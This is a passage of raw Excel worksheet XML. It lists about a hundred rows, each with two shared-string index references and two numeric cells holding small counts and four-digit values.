      <c r="C20596">
        <v>24</v>
      </c>
      <c r="D20596">
        <v>5467</v>
      </c>
    </row>
    <row r="20597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20597" t="s">
        <v>16224</v>
      </c>
      <c r="B20597" t="s">
        <v>16224</v>
      </c>
      <c r="C20597">
        <v>1</v>
      </c>
      <c r="D20597">
        <v>5467</v>
      </c>
    </row>
    <row r="20598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20598" t="s">
        <v>16228</v>
      </c>
      <c r="B20598" t="s">
        <v>16211</v>
      </c>
      <c r="C20598">
        <v>0</v>
      </c>
      <c r="D20598">
        <v>5637</v>
      </c>
    </row>
    <row r="20599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20599" t="s">
        <v>16231</v>
      </c>
      <c r="B20599" t="s">
        <v>16212</v>
      </c>
      <c r="C20599">
        <v>0</v>
      </c>
      <c r="D20599">
        <v>5637</v>
      </c>
    </row>
    <row r="20600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20600" t="s">
        <v>16228</v>
      </c>
      <c r="B20600" t="s">
        <v>16213</v>
      </c>
      <c r="C20600">
        <v>0</v>
      </c>
      <c r="D20600">
        <v>5637</v>
      </c>
    </row>
    <row r="20601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20601" t="s">
        <v>16231</v>
      </c>
      <c r="B20601" t="s">
        <v>16214</v>
      </c>
      <c r="C20601">
        <v>0</v>
      </c>
      <c r="D20601">
        <v>5637</v>
      </c>
    </row>
    <row r="20602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20602" t="s">
        <v>16228</v>
      </c>
      <c r="B20602" t="s">
        <v>16215</v>
      </c>
      <c r="C20602">
        <v>4</v>
      </c>
      <c r="D20602">
        <v>5637</v>
      </c>
    </row>
    <row r="20603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20603" t="s">
        <v>16231</v>
      </c>
      <c r="B20603" t="s">
        <v>16216</v>
      </c>
      <c r="C20603">
        <v>2</v>
      </c>
      <c r="D20603">
        <v>5637</v>
      </c>
    </row>
    <row r="20604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20604" t="s">
        <v>16228</v>
      </c>
      <c r="B20604" t="s">
        <v>16217</v>
      </c>
      <c r="C20604">
        <v>0</v>
      </c>
      <c r="D20604">
        <v>5637</v>
      </c>
    </row>
    <row r="20605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20605" t="s">
        <v>16231</v>
      </c>
      <c r="B20605" t="s">
        <v>16218</v>
      </c>
      <c r="C20605">
        <v>0</v>
      </c>
      <c r="D20605">
        <v>5637</v>
      </c>
    </row>
    <row r="20606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20606" t="s">
        <v>16229</v>
      </c>
      <c r="B20606" t="s">
        <v>16219</v>
      </c>
      <c r="C20606">
        <v>0</v>
      </c>
      <c r="D20606">
        <v>5637</v>
      </c>
    </row>
    <row r="20607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20607" t="s">
        <v>16230</v>
      </c>
      <c r="B20607" t="s">
        <v>16220</v>
      </c>
      <c r="C20607">
        <v>0</v>
      </c>
      <c r="D20607">
        <v>5637</v>
      </c>
    </row>
    <row r="20608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20608" t="s">
        <v>16229</v>
      </c>
      <c r="B20608" t="s">
        <v>16221</v>
      </c>
      <c r="C20608">
        <v>5</v>
      </c>
      <c r="D20608">
        <v>5637</v>
      </c>
    </row>
    <row r="20609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20609" t="s">
        <v>16230</v>
      </c>
      <c r="B20609" t="s">
        <v>16222</v>
      </c>
      <c r="C20609">
        <v>0</v>
      </c>
      <c r="D20609">
        <v>5637</v>
      </c>
    </row>
    <row r="20610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20610" t="s">
        <v>16223</v>
      </c>
      <c r="B20610" t="s">
        <v>16223</v>
      </c>
      <c r="C20610">
        <v>26</v>
      </c>
      <c r="D20610">
        <v>5637</v>
      </c>
    </row>
    <row r="20611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20611" t="s">
        <v>16224</v>
      </c>
      <c r="B20611" t="s">
        <v>16224</v>
      </c>
      <c r="C20611">
        <v>1</v>
      </c>
      <c r="D20611">
        <v>5637</v>
      </c>
    </row>
    <row r="20612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20612" t="s">
        <v>16228</v>
      </c>
      <c r="B20612" t="s">
        <v>16211</v>
      </c>
      <c r="C20612">
        <v>0</v>
      </c>
      <c r="D20612">
        <v>5609</v>
      </c>
    </row>
    <row r="20613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20613" t="s">
        <v>16231</v>
      </c>
      <c r="B20613" t="s">
        <v>16212</v>
      </c>
      <c r="C20613">
        <v>0</v>
      </c>
      <c r="D20613">
        <v>5609</v>
      </c>
    </row>
    <row r="20614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20614" t="s">
        <v>16228</v>
      </c>
      <c r="B20614" t="s">
        <v>16213</v>
      </c>
      <c r="C20614">
        <v>0</v>
      </c>
      <c r="D20614">
        <v>5609</v>
      </c>
    </row>
    <row r="20615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20615" t="s">
        <v>16231</v>
      </c>
      <c r="B20615" t="s">
        <v>16214</v>
      </c>
      <c r="C20615">
        <v>0</v>
      </c>
      <c r="D20615">
        <v>5609</v>
      </c>
    </row>
    <row r="20616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20616" t="s">
        <v>16228</v>
      </c>
      <c r="B20616" t="s">
        <v>16215</v>
      </c>
      <c r="C20616">
        <v>0</v>
      </c>
      <c r="D20616">
        <v>5609</v>
      </c>
    </row>
    <row r="20617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20617" t="s">
        <v>16231</v>
      </c>
      <c r="B20617" t="s">
        <v>16216</v>
      </c>
      <c r="C20617">
        <v>0</v>
      </c>
      <c r="D20617">
        <v>5609</v>
      </c>
    </row>
    <row r="20618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20618" t="s">
        <v>16228</v>
      </c>
      <c r="B20618" t="s">
        <v>16217</v>
      </c>
      <c r="C20618">
        <v>1</v>
      </c>
      <c r="D20618">
        <v>5609</v>
      </c>
    </row>
    <row r="20619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20619" t="s">
        <v>16231</v>
      </c>
      <c r="B20619" t="s">
        <v>16218</v>
      </c>
      <c r="C20619">
        <v>0</v>
      </c>
      <c r="D20619">
        <v>5609</v>
      </c>
    </row>
    <row r="20620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20620" t="s">
        <v>16229</v>
      </c>
      <c r="B20620" t="s">
        <v>16219</v>
      </c>
      <c r="C20620">
        <v>0</v>
      </c>
      <c r="D20620">
        <v>5609</v>
      </c>
    </row>
    <row r="20621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20621" t="s">
        <v>16230</v>
      </c>
      <c r="B20621" t="s">
        <v>16220</v>
      </c>
      <c r="C20621">
        <v>1</v>
      </c>
      <c r="D20621">
        <v>5609</v>
      </c>
    </row>
    <row r="20622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20622" t="s">
        <v>16229</v>
      </c>
      <c r="B20622" t="s">
        <v>16221</v>
      </c>
      <c r="C20622">
        <v>2</v>
      </c>
      <c r="D20622">
        <v>5609</v>
      </c>
    </row>
    <row r="20623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20623" t="s">
        <v>16230</v>
      </c>
      <c r="B20623" t="s">
        <v>16222</v>
      </c>
      <c r="C20623">
        <v>0</v>
      </c>
      <c r="D20623">
        <v>5609</v>
      </c>
    </row>
    <row r="20624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20624" t="s">
        <v>16223</v>
      </c>
      <c r="B20624" t="s">
        <v>16223</v>
      </c>
      <c r="C20624">
        <v>30</v>
      </c>
      <c r="D20624">
        <v>5609</v>
      </c>
    </row>
    <row r="20625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20625" t="s">
        <v>16224</v>
      </c>
      <c r="B20625" t="s">
        <v>16224</v>
      </c>
      <c r="C20625">
        <v>1</v>
      </c>
      <c r="D20625">
        <v>5609</v>
      </c>
    </row>
    <row r="20626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20626" t="s">
        <v>16228</v>
      </c>
      <c r="B20626" t="s">
        <v>16211</v>
      </c>
      <c r="C20626">
        <v>0</v>
      </c>
      <c r="D20626">
        <v>1890</v>
      </c>
    </row>
    <row r="20627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20627" t="s">
        <v>16231</v>
      </c>
      <c r="B20627" t="s">
        <v>16212</v>
      </c>
      <c r="C20627">
        <v>0</v>
      </c>
      <c r="D20627">
        <v>1890</v>
      </c>
    </row>
    <row r="20628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20628" t="s">
        <v>16228</v>
      </c>
      <c r="B20628" t="s">
        <v>16213</v>
      </c>
      <c r="C20628">
        <v>0</v>
      </c>
      <c r="D20628">
        <v>1890</v>
      </c>
    </row>
    <row r="20629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20629" t="s">
        <v>16231</v>
      </c>
      <c r="B20629" t="s">
        <v>16214</v>
      </c>
      <c r="C20629">
        <v>0</v>
      </c>
      <c r="D20629">
        <v>1890</v>
      </c>
    </row>
    <row r="20630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20630" t="s">
        <v>16228</v>
      </c>
      <c r="B20630" t="s">
        <v>16215</v>
      </c>
      <c r="C20630">
        <v>8</v>
      </c>
      <c r="D20630">
        <v>1890</v>
      </c>
    </row>
    <row r="20631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20631" t="s">
        <v>16231</v>
      </c>
      <c r="B20631" t="s">
        <v>16216</v>
      </c>
      <c r="C20631">
        <v>1</v>
      </c>
      <c r="D20631">
        <v>1890</v>
      </c>
    </row>
    <row r="20632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20632" t="s">
        <v>16228</v>
      </c>
      <c r="B20632" t="s">
        <v>16217</v>
      </c>
      <c r="C20632">
        <v>5</v>
      </c>
      <c r="D20632">
        <v>1890</v>
      </c>
    </row>
    <row r="20633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20633" t="s">
        <v>16231</v>
      </c>
      <c r="B20633" t="s">
        <v>16218</v>
      </c>
      <c r="C20633">
        <v>1</v>
      </c>
      <c r="D20633">
        <v>1890</v>
      </c>
    </row>
    <row r="20634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20634" t="s">
        <v>16229</v>
      </c>
      <c r="B20634" t="s">
        <v>16219</v>
      </c>
      <c r="C20634">
        <v>0</v>
      </c>
      <c r="D20634">
        <v>1890</v>
      </c>
    </row>
    <row r="20635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20635" t="s">
        <v>16230</v>
      </c>
      <c r="B20635" t="s">
        <v>16220</v>
      </c>
      <c r="C20635">
        <v>0</v>
      </c>
      <c r="D20635">
        <v>1890</v>
      </c>
    </row>
    <row r="20636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20636" t="s">
        <v>16229</v>
      </c>
      <c r="B20636" t="s">
        <v>16221</v>
      </c>
      <c r="C20636">
        <v>20</v>
      </c>
      <c r="D20636">
        <v>1890</v>
      </c>
    </row>
    <row r="20637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20637" t="s">
        <v>16230</v>
      </c>
      <c r="B20637" t="s">
        <v>16222</v>
      </c>
      <c r="C20637">
        <v>0</v>
      </c>
      <c r="D20637">
        <v>1890</v>
      </c>
    </row>
    <row r="20638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20638" t="s">
        <v>16223</v>
      </c>
      <c r="B20638" t="s">
        <v>16223</v>
      </c>
      <c r="C20638">
        <v>24</v>
      </c>
      <c r="D20638">
        <v>1890</v>
      </c>
    </row>
    <row r="20639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20639" t="s">
        <v>16224</v>
      </c>
      <c r="B20639" t="s">
        <v>16224</v>
      </c>
      <c r="C20639">
        <v>8</v>
      </c>
      <c r="D20639">
        <v>1890</v>
      </c>
    </row>
    <row r="20640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20640" t="s">
        <v>16228</v>
      </c>
      <c r="B20640" t="s">
        <v>16211</v>
      </c>
      <c r="C20640">
        <v>0</v>
      </c>
      <c r="D20640">
        <v>1733</v>
      </c>
    </row>
    <row r="20641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20641" t="s">
        <v>16231</v>
      </c>
      <c r="B20641" t="s">
        <v>16212</v>
      </c>
      <c r="C20641">
        <v>0</v>
      </c>
      <c r="D20641">
        <v>1733</v>
      </c>
    </row>
    <row r="20642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20642" t="s">
        <v>16228</v>
      </c>
      <c r="B20642" t="s">
        <v>16213</v>
      </c>
      <c r="C20642">
        <v>0</v>
      </c>
      <c r="D20642">
        <v>1733</v>
      </c>
    </row>
    <row r="20643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20643" t="s">
        <v>16231</v>
      </c>
      <c r="B20643" t="s">
        <v>16214</v>
      </c>
      <c r="C20643">
        <v>0</v>
      </c>
      <c r="D20643">
        <v>1733</v>
      </c>
    </row>
    <row r="20644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20644" t="s">
        <v>16228</v>
      </c>
      <c r="B20644" t="s">
        <v>16215</v>
      </c>
      <c r="C20644">
        <v>3</v>
      </c>
      <c r="D20644">
        <v>1733</v>
      </c>
    </row>
    <row r="20645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20645" t="s">
        <v>16231</v>
      </c>
      <c r="B20645" t="s">
        <v>16216</v>
      </c>
      <c r="C20645">
        <v>8</v>
      </c>
      <c r="D20645">
        <v>1733</v>
      </c>
    </row>
    <row r="20646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20646" t="s">
        <v>16228</v>
      </c>
      <c r="B20646" t="s">
        <v>16217</v>
      </c>
      <c r="C20646">
        <v>23</v>
      </c>
      <c r="D20646">
        <v>1733</v>
      </c>
    </row>
    <row r="20647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20647" t="s">
        <v>16231</v>
      </c>
      <c r="B20647" t="s">
        <v>16218</v>
      </c>
      <c r="C20647">
        <v>0</v>
      </c>
      <c r="D20647">
        <v>1733</v>
      </c>
    </row>
    <row r="20648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20648" t="s">
        <v>16229</v>
      </c>
      <c r="B20648" t="s">
        <v>16219</v>
      </c>
      <c r="C20648">
        <v>0</v>
      </c>
      <c r="D20648">
        <v>1733</v>
      </c>
    </row>
    <row r="20649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20649" t="s">
        <v>16230</v>
      </c>
      <c r="B20649" t="s">
        <v>16220</v>
      </c>
      <c r="C20649">
        <v>18</v>
      </c>
      <c r="D20649">
        <v>1733</v>
      </c>
    </row>
    <row r="20650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20650" t="s">
        <v>16229</v>
      </c>
      <c r="B20650" t="s">
        <v>16221</v>
      </c>
      <c r="C20650">
        <v>44</v>
      </c>
      <c r="D20650">
        <v>1733</v>
      </c>
    </row>
    <row r="20651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20651" t="s">
        <v>16230</v>
      </c>
      <c r="B20651" t="s">
        <v>16222</v>
      </c>
      <c r="C20651">
        <v>102</v>
      </c>
      <c r="D20651">
        <v>1733</v>
      </c>
    </row>
    <row r="20652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20652" t="s">
        <v>16223</v>
      </c>
      <c r="B20652" t="s">
        <v>16223</v>
      </c>
      <c r="C20652">
        <v>25</v>
      </c>
      <c r="D20652">
        <v>1733</v>
      </c>
    </row>
    <row r="20653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20653" t="s">
        <v>16224</v>
      </c>
      <c r="B20653" t="s">
        <v>16224</v>
      </c>
      <c r="C20653">
        <v>2</v>
      </c>
      <c r="D20653">
        <v>1733</v>
      </c>
    </row>
    <row r="20654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20654" t="s">
        <v>16228</v>
      </c>
      <c r="B20654" t="s">
        <v>16211</v>
      </c>
      <c r="C20654">
        <v>0</v>
      </c>
      <c r="D20654">
        <v>5694</v>
      </c>
    </row>
    <row r="20655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20655" t="s">
        <v>16231</v>
      </c>
      <c r="B20655" t="s">
        <v>16212</v>
      </c>
      <c r="C20655">
        <v>0</v>
      </c>
      <c r="D20655">
        <v>5694</v>
      </c>
    </row>
    <row r="20656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20656" t="s">
        <v>16228</v>
      </c>
      <c r="B20656" t="s">
        <v>16213</v>
      </c>
      <c r="C20656">
        <v>0</v>
      </c>
      <c r="D20656">
        <v>5694</v>
      </c>
    </row>
    <row r="20657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20657" t="s">
        <v>16231</v>
      </c>
      <c r="B20657" t="s">
        <v>16214</v>
      </c>
      <c r="C20657">
        <v>0</v>
      </c>
      <c r="D20657">
        <v>5694</v>
      </c>
    </row>
    <row r="20658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20658" t="s">
        <v>16228</v>
      </c>
      <c r="B20658" t="s">
        <v>16215</v>
      </c>
      <c r="C20658">
        <v>0</v>
      </c>
      <c r="D20658">
        <v>5694</v>
      </c>
    </row>
    <row r="20659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20659" t="s">
        <v>16231</v>
      </c>
      <c r="B20659" t="s">
        <v>16216</v>
      </c>
      <c r="C20659">
        <v>1</v>
      </c>
      <c r="D20659">
        <v>5694</v>
      </c>
    </row>
    <row r="20660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20660" t="s">
        <v>16228</v>
      </c>
      <c r="B20660" t="s">
        <v>16217</v>
      </c>
      <c r="C20660">
        <v>0</v>
      </c>
      <c r="D20660">
        <v>5694</v>
      </c>
    </row>
    <row r="20661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20661" t="s">
        <v>16231</v>
      </c>
      <c r="B20661" t="s">
        <v>16218</v>
      </c>
      <c r="C20661">
        <v>1</v>
      </c>
      <c r="D20661">
        <v>5694</v>
      </c>
    </row>
    <row r="20662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20662" t="s">
        <v>16229</v>
      </c>
      <c r="B20662" t="s">
        <v>16219</v>
      </c>
      <c r="C20662">
        <v>0</v>
      </c>
      <c r="D20662">
        <v>5694</v>
      </c>
    </row>
    <row r="20663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20663" t="s">
        <v>16230</v>
      </c>
      <c r="B20663" t="s">
        <v>16220</v>
      </c>
      <c r="C20663">
        <v>0</v>
      </c>
      <c r="D20663">
        <v>5694</v>
      </c>
    </row>
    <row r="20664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20664" t="s">
        <v>16229</v>
      </c>
      <c r="B20664" t="s">
        <v>16221</v>
      </c>
      <c r="C20664">
        <v>0</v>
      </c>
      <c r="D20664">
        <v>5694</v>
      </c>
    </row>
    <row r="20665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20665" t="s">
        <v>16230</v>
      </c>
      <c r="B20665" t="s">
        <v>16222</v>
      </c>
      <c r="C20665">
        <v>0</v>
      </c>
      <c r="D20665">
        <v>5694</v>
      </c>
    </row>
    <row r="20666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20666" t="s">
        <v>16223</v>
      </c>
      <c r="B20666" t="s">
        <v>16223</v>
      </c>
      <c r="C20666">
        <v>20</v>
      </c>
      <c r="D20666">
        <v>5694</v>
      </c>
    </row>
    <row r="20667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20667" t="s">
        <v>16224</v>
      </c>
      <c r="B20667" t="s">
        <v>16224</v>
      </c>
      <c r="C20667">
        <v>0</v>
      </c>
      <c r="D20667">
        <v>5694</v>
      </c>
    </row>
    <row r="20668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20668" t="s">
        <v>16228</v>
      </c>
      <c r="B20668" t="s">
        <v>16211</v>
      </c>
      <c r="C20668">
        <v>0</v>
      </c>
      <c r="D20668">
        <v>1808</v>
      </c>
    </row>
    <row r="20669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20669" t="s">
        <v>16231</v>
      </c>
      <c r="B20669" t="s">
        <v>16212</v>
      </c>
      <c r="C20669">
        <v>0</v>
      </c>
      <c r="D20669">
        <v>1808</v>
      </c>
    </row>
    <row r="20670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20670" t="s">
        <v>16228</v>
      </c>
      <c r="B20670" t="s">
        <v>16213</v>
      </c>
      <c r="C20670">
        <v>0</v>
      </c>
      <c r="D20670">
        <v>1808</v>
      </c>
    </row>
    <row r="20671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20671" t="s">
        <v>16231</v>
      </c>
      <c r="B20671" t="s">
        <v>16214</v>
      </c>
      <c r="C20671">
        <v>0</v>
      </c>
      <c r="D20671">
        <v>1808</v>
      </c>
    </row>
    <row r="20672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20672" t="s">
        <v>16228</v>
      </c>
      <c r="B20672" t="s">
        <v>16215</v>
      </c>
      <c r="C20672">
        <v>0</v>
      </c>
      <c r="D20672">
        <v>1808</v>
      </c>
    </row>
    <row r="20673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20673" t="s">
        <v>16231</v>
      </c>
      <c r="B20673" t="s">
        <v>16216</v>
      </c>
      <c r="C20673">
        <v>1</v>
      </c>
      <c r="D20673">
        <v>1808</v>
      </c>
    </row>
    <row r="20674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20674" t="s">
        <v>16228</v>
      </c>
      <c r="B20674" t="s">
        <v>16217</v>
      </c>
      <c r="C20674">
        <v>5</v>
      </c>
      <c r="D20674">
        <v>1808</v>
      </c>
    </row>
    <row r="20675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20675" t="s">
        <v>16231</v>
      </c>
      <c r="B20675" t="s">
        <v>16218</v>
      </c>
      <c r="C20675">
        <v>1</v>
      </c>
      <c r="D20675">
        <v>1808</v>
      </c>
    </row>
    <row r="20676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20676" t="s">
        <v>16229</v>
      </c>
      <c r="B20676" t="s">
        <v>16219</v>
      </c>
      <c r="C20676">
        <v>0</v>
      </c>
      <c r="D20676">
        <v>1808</v>
      </c>
    </row>
    <row r="20677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20677" t="s">
        <v>16230</v>
      </c>
      <c r="B20677" t="s">
        <v>16220</v>
      </c>
      <c r="C20677">
        <v>0</v>
      </c>
      <c r="D20677">
        <v>1808</v>
      </c>
    </row>
    <row r="20678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20678" t="s">
        <v>16229</v>
      </c>
      <c r="B20678" t="s">
        <v>16221</v>
      </c>
      <c r="C20678">
        <v>50</v>
      </c>
      <c r="D20678">
        <v>1808</v>
      </c>
    </row>
    <row r="20679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20679" t="s">
        <v>16230</v>
      </c>
      <c r="B20679" t="s">
        <v>16222</v>
      </c>
      <c r="C20679">
        <v>280</v>
      </c>
      <c r="D20679">
        <v>1808</v>
      </c>
    </row>
    <row r="20680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20680" t="s">
        <v>16223</v>
      </c>
      <c r="B20680" t="s">
        <v>16223</v>
      </c>
      <c r="C20680">
        <v>6</v>
      </c>
      <c r="D20680">
        <v>1808</v>
      </c>
    </row>
    <row r="20681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20681" t="s">
        <v>16224</v>
      </c>
      <c r="B20681" t="s">
        <v>16224</v>
      </c>
      <c r="C20681">
        <v>2</v>
      </c>
      <c r="D20681">
        <v>1808</v>
      </c>
    </row>
    <row r="20682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20682" t="s">
        <v>16228</v>
      </c>
      <c r="B20682" t="s">
        <v>16211</v>
      </c>
      <c r="C20682">
        <v>0</v>
      </c>
      <c r="D20682">
        <v>5313</v>
      </c>
    </row>
    <row r="20683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20683" t="s">
        <v>16231</v>
      </c>
      <c r="B20683" t="s">
        <v>16212</v>
      </c>
      <c r="C20683">
        <v>0</v>
      </c>
      <c r="D20683">
        <v>5313</v>
      </c>
    </row>
    <row r="20684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20684" t="s">
        <v>16228</v>
      </c>
      <c r="B20684" t="s">
        <v>16213</v>
      </c>
      <c r="C20684">
        <v>0</v>
      </c>
      <c r="D20684">
        <v>5313</v>
      </c>
    </row>
    <row r="20685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20685" t="s">
        <v>16231</v>
      </c>
      <c r="B20685" t="s">
        <v>16214</v>
      </c>
      <c r="C20685">
        <v>0</v>
      </c>
      <c r="D20685">
        <v>5313</v>
      </c>
    </row>
    <row r="20686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20686" t="s">
        <v>16228</v>
      </c>
      <c r="B20686" t="s">
        <v>16215</v>
      </c>
      <c r="C20686">
        <v>1</v>
      </c>
      <c r="D20686">
        <v>5313</v>
      </c>
    </row>
    <row r="20687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20687" t="s">
        <v>16231</v>
      </c>
      <c r="B20687" t="s">
        <v>16216</v>
      </c>
      <c r="C20687">
        <v>2</v>
      </c>
      <c r="D20687">
        <v>5313</v>
      </c>
    </row>
    <row r="20688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20688" t="s">
        <v>16228</v>
      </c>
      <c r="B20688" t="s">
        <v>16217</v>
      </c>
      <c r="C20688">
        <v>3</v>
      </c>
      <c r="D20688">
        <v>5313</v>
      </c>
    </row>
    <row r="20689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20689" t="s">
        <v>16231</v>
      </c>
      <c r="B20689" t="s">
        <v>16218</v>
      </c>
      <c r="C20689">
        <v>0</v>
      </c>
      <c r="D20689">
        <v>5313</v>
      </c>
    </row>
    <row r="20690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20690" t="s">
        <v>16229</v>
      </c>
      <c r="B20690" t="s">
        <v>16219</v>
      </c>
      <c r="C20690">
        <v>0</v>
      </c>
      <c r="D20690">
        <v>5313</v>
      </c>
    </row>
    <row r="20691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20691" t="s">
        <v>16230</v>
      </c>
      <c r="B20691" t="s">
        <v>16220</v>
      </c>
      <c r="C20691">
        <v>2</v>
      </c>
      <c r="D20691">
        <v>5313</v>
      </c>
    </row>
    <row r="20692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20692" t="s">
        <v>16229</v>
      </c>
      <c r="B20692" t="s">
        <v>16221</v>
      </c>
      <c r="C20692">
        <v>26</v>
      </c>
      <c r="D20692">
        <v>5313</v>
      </c>
    </row>
    <row r="20693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20693" t="s">
        <v>16230</v>
      </c>
      <c r="B20693" t="s">
        <v>16222</v>
      </c>
      <c r="C20693">
        <v>0</v>
      </c>
      <c r="D20693">
        <v>5313</v>
      </c>
    </row>
    <row r="20694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20694" t="s">
        <v>16223</v>
      </c>
      <c r="B20694" t="s">
        <v>16223</v>
      </c>
      <c r="C20694">
        <v>6</v>
      </c>
      <c r="D20694">
        <v>5313</v>
      </c>
    </row>
    <row r="20695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20695" t="s">
        <v>16224</v>
      </c>
      <c r="B20695" t="s">
        <v>16224</v>
      </c>
      <c r="C20695">
        <v>1</v>
      </c>
      <c r="D20695">
        <v>5313</v>
      </c>
    </row>
    <row r="20696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20696" t="s">
        <v>16228</v>
      </c>
      <c r="B20696" t="s">
        <v>16211</v>
      </c>
      <c r="C20696">
        <v>0</v>
      </c>
      <c r="D20696">
        <v>1796</v>
      </c>
    </row>
    <row r="20697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20697" t="s">
        <v>16231</v>
      </c>
      <c r="B20697" t="s">
        <v>16212</v>
      </c>
      <c r="C20697">
        <v>0</v>
      </c>
      <c r="D20697">
        <v>1796</v>
      </c>
    </row>
    <row r="20698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20698" t="s">
        <v>16228</v>
      </c>
      <c r="B20698" t="s">
        <v>16213</v>
      </c>
      <c r="C20698">
        <v>0</v>
      </c>
      <c r="D20698">
        <v>1796</v>
      </c>
    </row>
    <row r="20699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20699" t="s">
        <v>16231</v>
      </c>
      <c r="B20699" t="s">
        <v>16214</v>
      </c>
      <c r="C20699">
        <v>0</v>
      </c>
      <c r="D20699">
        <v>1796</v>
      </c>
    </row>
    <row r="20700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20700" t="s">
        <v>16228</v>
      </c>
      <c r="B20700" t="s">
        <v>16215</v>
      </c>
      <c r="C20700">
        <v>1</v>
      </c>
      <c r="D20700">
        <v>1796</v>
      </c>
    </row>
    <row r="20701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20701" t="s">
        <v>16231</v>
      </c>
      <c r="B20701" t="s">
